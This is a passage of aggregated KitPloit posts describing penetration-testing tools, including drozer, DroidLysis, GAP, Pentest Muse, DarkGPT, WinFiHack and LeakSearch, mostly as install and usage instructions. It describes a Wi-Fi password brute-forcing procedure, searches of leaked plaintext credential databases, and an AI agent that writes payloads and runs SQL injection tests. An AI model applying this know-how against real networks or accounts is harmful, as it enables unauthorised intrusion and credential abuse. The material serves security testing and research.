    • Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.
      - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
    • LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.
      - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
    • Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
    • Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

    v0.2

    What's new, and why is it useful?

    • Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.
      - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
    • User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
    • Improved error handling for missing API keys - Improved user experience.
    • Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

    v0.1

    Initial release.

    Requirements

    • Recent version of Python.
    • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
    • OpenAI API key.
    • LangChain API key (optional) - see LangSmith Setup section below for further details.
    • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

    Installation

    Option 1: Cloning the Repository

    1. Clone this repository:
    git clone https://github.com/mrwadams/attackgen.git
    2. Change directory into the cloned repository:
    cd attackgen
    3. Install the required Python packages:
    pip install -r requirements.txt

    Option 2: Using Docker

    1. Pull the Docker container image from Docker Hub:
    docker pull mrwadams/attackgen

    LangSmith Setup

    If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

    If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

    Data Setup

    Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Ensure to place this file in the ./data/ directory within the repository.

    Running AttackGen

    After the data setup, you can run AttackGen with the following command:

    streamlit run 👋_Welcome.py

    You can also try the app on Streamlit Community Cloud.

    Usage

    Running AttackGen

    Option 1: Running the Streamlit App Locally

    1. Run the Streamlit app:
    streamlit run 👋_Welcome.py
    2. Open your web browser and navigate to the URL provided by Streamlit.
    3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Option 2: Using the Docker Container Image

    1. Run the Docker container:
    docker run -p 8501:8501 mrwadams/attackgen

    This command will start the container and map port 8501 (the default for Streamlit apps) from the container to your host machine.
    2. Open your web browser and navigate to http://localhost:8501.
    3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Generating Scenarios

    Standard Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Threat Group Scenarios page.
    5. Select the Threat Actor Group that you want to simulate.
    6. Click on 'Generate Scenario' to create the incident response scenario.
    7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Custom Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Custom Scenario page.
    5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
    6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
    7. Use the 👍 or 👎 buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

    Contributing

    I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

    Licence

    This project is licensed under GNU GPLv3.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

    By: Zion3R β€” April 3rd 2024 at 11:30


    ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


    ~ Hilali Abdel

    USAGE

    python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

    [Add new Device]

    python3 smartthings.py -a 192.168.1.1

    python3 smartthings.py -s --type TPLINK

    python3 smartthings.py -s --firmware TP-Link Archer C7v2

    Search for CVE and PoC [firmware and device type]


    Scan device for open UPnP ports

    python3 smartthings.py -s --scan upnp --id

    Get data from MQTT 'subscribe':

    python3 smartthings.py -s --scan mqtt --id



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Drozer - The Leading Security Assessment Framework For Android

    By: Zion3R β€” April 1st 2024 at 11:30


    drozer (formerly Mercury) is the leading security testing framework for Android.

    drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (WithSecure's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).

    drozer is a good tool for simulating a rogue application. A penetration tester does not have to develop an app with custom code to interface with a specific content provider. Instead, drozer can be used with little to no programming experience required to show the impact of letting certain components be exported on a device.

    drozer is open source software, maintained by WithSecure, and can be downloaded from: https://labs.withsecure.com/tools/drozer/


    Docker Container

    To help with making sure drozer can be run on modern systems, a Docker container was created that has a working build of Drozer. This is currently the recommended method of using Drozer on modern systems.

    • The Docker container and basic setup instructions can be found here.
    • Instructions on building your own Docker container can be found here.

    Manual Building and Installation

    Prerequisites

    1. Python 2.7

    Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

    2. Protobuf 2.6 or greater

    3. Pyopenssl 16.2 or greater

    4. Twisted 10.2 or greater

    5. Java Development Kit 1.7

    Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

    6. Android Debug Bridge

    Building Python wheel

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python setup.py bdist_wheel

    Installing Python wheel

    sudo pip install dist/drozer-2.x.x-py2-none-any.whl

    Building for Debian/Ubuntu/Mint

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make deb

    Installing .deb (Debian/Ubuntu/Mint)

    sudo dpkg -i drozer-2.x.x.deb

    Building for Redhat/Fedora/CentOS

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    make rpm

    Installing .rpm (Redhat/Fedora/CentOS)

    sudo rpm -I drozer-2.x.x-1.noarch.rpm

    Building for Windows

    NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

    git clone https://github.com/WithSecureLabs/drozer.git
    cd drozer
    python.exe setup.py bdist_msi

    Installing .msi (Windows)

    Run dist/drozer-2.x.x.win-x.msi 

    Usage

    Installing the Agent

    Drozer can be installed using Android Debug Bridge (adb).

    Download the latest Drozer Agent here.

    $ adb install drozer-agent-2.x.x.apk

    Starting a Session

    You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you're ready to start exploring.

    We will use the server embedded in the drozer Agent to do this.

    If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:

    $ adb forward tcp:31415 tcp:31415

    Now, launch the Agent, select the "Embedded Server" option and tap "Enable" to start the server. You should see a notification that the server has started.

    Then, on your PC, connect using the drozer Console:

    On Linux:

    $ drozer console connect

    On Windows:

    > drozer.bat console connect

    If using a real device, the IP address of the device on the network must be specified:

    On Linux:

    $ drozer console connect --server 192.168.0.10

    On Windows:

    > drozer.bat console connect --server 192.168.0.10

    You should be presented with a drozer command prompt:

    selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
    dz>

    The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.

    You are now ready to start exploring the device.
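
    For example, a common first step is to enumerate the installed packages (module name taken from drozer's standard module set):

    dz> run app.package.list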

    Command Reference

    Command        Description
    run            Executes a drozer module
    list           Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
    shell          Start an interactive Linux shell on the device, in the context of the Agent process.
    cd             Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
    clean          Remove temporary files stored by drozer on the Android device.
    contributors   Displays a list of people who have contributed to the drozer framework and modules in use on your system.
    echo           Print text to the console.
    exit           Terminate the drozer session.
    help           Display help about a particular command or module.
    load           Load a file containing drozer commands, and execute them in sequence.
    module         Find and install additional drozer modules from the Internet.
    permissions    Display a list of the permissions granted to the drozer Agent.
    set            Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
    unset          Remove a named variable that drozer passes to any Linux shells that it spawns.

    License

    drozer is released under a 3-clause BSD License. See LICENSE for full details.

    Contacting the Project

    drozer is Open Source software, made great by contributions from the community.

    Bug reports, feature requests, comments and questions can be submitted here.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    DroidLysis - Property Extractor For Android Apps

    By: Zion3R β€” March 31st 2024 at 11:30


    DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

    DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


    Installing DroidLysis

    1. Install required system packages:
    sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
    2. Install Android disassembly tools:

    • Apktool,
    • Baksmali, and optionally
    • Dex2jar and
    • Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).

    $ mkdir -p ~/softs
    $ cd ~/softs
    $ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
    $ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
    $ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
    $ unzip dex-tools-v2.4.zip
    $ rm -f dex-tools-v2.4.zip
    3. Get DroidLysis from the Git repository (preferred) or from pip

    Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

    $ python3 -m venv venv
    $ source ./venv/bin/activate
    (venv) $ pip3 install git+https://github.com/cryptax/droidlysis

    Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

    4. Configure conf/general.conf. In particular, make sure to replace /home/axelle with your appropriate directories.
    [tools]
    apktool = /home/axelle/softs/apktool_2.9.3.jar
    baksmali = /home/axelle/softs/baksmali-2.5.2.jar
    dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
    procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
    keytool = /usr/bin/keytool
    ...
    5. Run it:
    python3 ./droidlysis3.py --help

    Configuration

    The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

    Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

    Usage

    DroidLysis uses Python 3. To launch it and get options:

    droidlysis --help

    For example, test it on Signal's APK:

    droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

    DroidLysis outputs:

    • A summary on the console (see image above)
    • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
    • A database (by default, SQLite droidlysis.db) containing properties it noticed.

    Options

    Get usage with droidlysis --help

    • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.

    • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

    • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

    • DroidLysis's analysis does not inspect known 3rd party SDKs by default, i.e. it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

    Sample output directory (--output DIR)

    This directory contains (when applicable):

    • A readable AndroidManifest.xml
    • Readable resources in res
    • Libraries lib, assets assets
    • Disassembled Smali code: smali (and others)
    • Package meta information: META-INF
    • Package contents when simply unzipped in ./unzipped
    • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

    The following files are generated by DroidLysis:

    • autoanalysis.md: lists each pattern DroidLysis detected and where.
    • report.md: same as what was printed on the console

    If you do not need the sample output directory to be generated, use the option --clearoutput.

    Import trackers from Exodus etc (--import-exodus)

    $ python3 ./droidlysis3.py --import-exodus --verbose
    Processing file: ./droidurl.pyc ...
    DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
    DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
    DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
    DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
    DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
    DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
    DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

    Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

    SQLite database

    If you want to process a directory of samples, you'll probably want to store the properties DroidLysis finds in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table corresponds to a given sample, and each column to a property DroidLysis tracks.

    For example, to retrieve the filename, SHA256 sum and Smali properties of every sample in the database:

    sqlite> select sha256, sanitized_basename, smali_properties from samples;
    f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
    ...
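    For programmatic access, the same data can be read with Python's built-in sqlite3 module. This is a minimal sketch assuming the default droidlysis.db database and the samples table and column names shown in the query above.

    import json
    import sqlite3

    # Assumes the default database (droidlysis.db) produced by --enable-sql,
    # and the column names shown in the example query above.
    conn = sqlite3.connect('droidlysis.db')
    for sha256, name, smali in conn.execute(
            'SELECT sha256, sanitized_basename, smali_properties FROM samples'):
        props = json.loads(smali)  # smali_properties is stored as JSON text
        if props.get('send_sms'):
            print(f'{name} ({sha256[:12]}...) matches send_sms')
    conn.close()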

    Property patterns

    What DroidLysis detects can be configured and extended in the files of the ./conf directory.

    A pattern consists of:

    • a tag name: for example send_sms. This names the property and must be unique across the .conf file.
    • a pattern: a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
    • a description (optional): explains the importance of the property and what it means.
    [send_sms]
    pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
    description=Sending SMS messages
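    To see how such a pattern is applied, here is a minimal sketch (not DroidLysis's actual matching code) that loads the send_sms entry from smali.conf and searches a sample Smali line with it; the conf path is assumed relative to the DroidLysis checkout.

    import configparser
    import re

    config = configparser.RawConfigParser()
    config.read('conf/smali.conf')  # assumed path to the property patterns
    pattern = re.compile(config['send_sms']['pattern'])

    smali_line = 'invoke-virtual {v0, v1}, Landroid/telephony/SmsManager;->sendTextMessage(...)V'
    if pattern.search(smali_line):
        print('send_sms property detected')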

    Importing Exodus Privacy Trackers

    Exodus Privacy maintains a list of various SDKs which are useful to rule out in our analysis via conf/kit.conf. Add option --import-exodus to the droidlysis command line: this will parse the trackers Exodus Privacy knows about which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

    Afterwards, you may want to sort your kit.conf file:

    import configparser
    import collections
    import os

    config = configparser.ConfigParser({}, collections.OrderedDict)
    config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
    # Order all sections alphabetically
    config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
    with open('sorted.conf', 'w') as f:
        config.write(f)

    Updates

    • v3.4.6 - Detecting manifest feature that automatically loads APK at install
    • v3.4.5 - Creating a writable user kit.conf file
    • v3.4.4 - Bug fix #14
    • v3.4.3 - Using configuration files
    • v3.4.2 - Adding import of Exodus Privacy Trackers
    • v3.4.1 - Removed dependency to Androguard
    • v3.4.0 - Multidex support
    • v3.3.1 - Improving detection of Base64 strings
    • v3.3.0 - Dumping data to JSON
    • v3.2.1 - IP address detection
    • v3.2.0 - Dex2jar is optional
    • v3.1.0 - Detection of Base64 strings


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R β€” March 24th 2024 at 11:30


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

    git clone https://github.com/pentestmuse-ai/PentestMuse
    cd PentestMuse

    2. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

    You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

    You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

    OpenAI API keys

    Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist

    By: Zion3R β€” March 19th 2024 at 11:30

    This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


    TL;DR

    Installation

    1. Visit the Jython Official Site, and download the latest standalone JAR file, e.g. jython-standalone-2.7.3.jar.
    2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
    3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
    4. Download the GAP.py and requirements.txt from this project and place in the same directory.
    5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
    6. Go to the Extensions -> Installed and click Add under Burp Extensions.
    7. Select Extension type of Python and select the GAP.py file.

    Using

    1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:

    Or you can right click a request or response in any other context and select GAP from the Extensions menu.

    2. Then go to the GAP tab to see the results:

    IMPORTANT Notes

    If you don't need one of the modes, un-check it; results will be returned more quickly.

    If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run it for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.

    If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.

    It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.

    The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

    In Depth Instructions

    Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

    NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.

    TODO

    • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
    • Add an option to not add the Tentative Issues, e.g. parameters that were found in the Response (but not as query parameters in links found).
    • Improve performance of the link finding regular expressions.
    • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
    • Deal with other size displays and font sizes better to make sure all controls are viewable.
    • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
    • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

    Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β˜• (I could use the caffeine!)

    🀘 /XNL-h4ck3r



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

    By: Zion3R β€” March 13th 2024 at 11:30


    DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


    Prerequisites

    Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

    Environment Setup

    1. Clone the Repository

    First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

    git clone https://github.com/luijait/DarkGPT.git
    cd DarkGPT

    2. Configure Environment Variables

    You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

    DEHASHED_API_KEY="your_dehashed_api_key_here"

    3. Install Dependencies

    This project requires certain Python packages to run. Install them by running the following command:

    pip install -r requirements.txt

    4. Then run the project:

    python3 main.py



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

    By: Zion3R β€” March 7th 2024 at 11:30


    WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script, using netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.


    Installation

    The packages are minimal or nearly none πŸ˜…. The package install command is:

    pip install rich pyfiglet

    That's it.


    Features

    So listing the features:

    • Overall Features:
    • We can use custom interfaces or non-default interfaces to run the attack.
    • Well-defined way of using netsh and listing and utilizing targets.
    • Upgradeability
    • Code-Wise Features:
    • Interactive menu-driven system with rich.
    • Versatility in using interfaces, targets, and password files.

    How it works

    So this is how the bruteforcer works:

    • Provide Interface:

    • The user is required to provide the network interface for the tool to use.

    • By default, the interface is set to Wi-Fi.

    • Search and Set Target:

    • The user must search for and select the target network.

    • During this process, the tool performs the following sub-steps:

      • Disconnects all active network connections for the selected interface.
      • Searches for all available networks within range.
    • Input Password File:

    • The user inputs the path to the password file.

    • The default path for the password file is ./wordlist/default.txt.

    • Run the Attack:

    • With the target set and the password file ready, the tool is now prepared to initiate the attack.

    • Attack Procedure:

    • The attack involves iterating through each password in the provided file.
    • For each password, the following steps are taken:
      • A custom XML configuration for the connection attempt is generated and stored.
      • The tool attempts to connect to the target network using the generated XML and the current password.
      • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
      • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
      • This loop continues until a successful ping response is received, indicating a successful connection attempt.

    How to run this

    After installing all the packages, just run python main.py; the rest is history πŸ‘. Make sure you run this on Windows, because it won't work on any other OS. The interface looks like this:

    Β 


    Contributions

    For contributions:
    • First Clone: Clone the repo into your dev environment and make your edits.
    • Comments: I would appreciate it if you could add comments explaining your POV and the upgrade.
    • Submit: Submit a PR for me to verify the changes and approve it if necessary.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LeakSearch - Search & Parse Password Leaks

    By: Zion3R β€” February 29th 2024 at 23:30


    LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy, and you can also use your own password file to search using different keywords, such as user, domain or password.

    In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.


    Requirements
    • Python 3
    • Install requirements

    Download

    It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

    git clone https://github.com/JoelGMSec/LeakSearch

    Usage
      _               _     ____                      _     
    | | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
    | | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
    | |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
    |_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|

    ------------------- by @JoelGMSec -------------------

    usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

    options:
    -h, --help show this help message and exit
    -d DATABASE, --database DATABASE
    Database used for the search (ProxyNova or LocalDataBase)
    -k KEYWORD, --keyword KEYWORD
    Keyword (user/domain/pass) to search for leaks in the DB
    -n NUMBER, --number NUMBER
    Number of results to show (default is 20)
    -o OUTPUT, --output OUTPUT
    Save the results as json or txt into a file
    -p PROXY, --proxy PROXY
    Set HTTP/S proxy (like http://localhost:8080)


    The detailed guide of use can be found at the following link:

    https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch


    License

    This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


    Credits and Acknowledgments

    This tool has been created and designed from scratch by Joel GΓ‘mez Molina (@JoelGMSec).


    Contact

    This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

    For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings

    By: Zion3R β€” February 27th 2024 at 11:30


    New bug bounty (vulnerability) collector


    Requirements
    • Chrome with GUI (if you encounter trouble with script execution, check the status of the VM's GPU features, if available)
    • Chrome WebDriver

    Preview
    # python3 main.py

    *2024-02-20 16:14:47.836189*

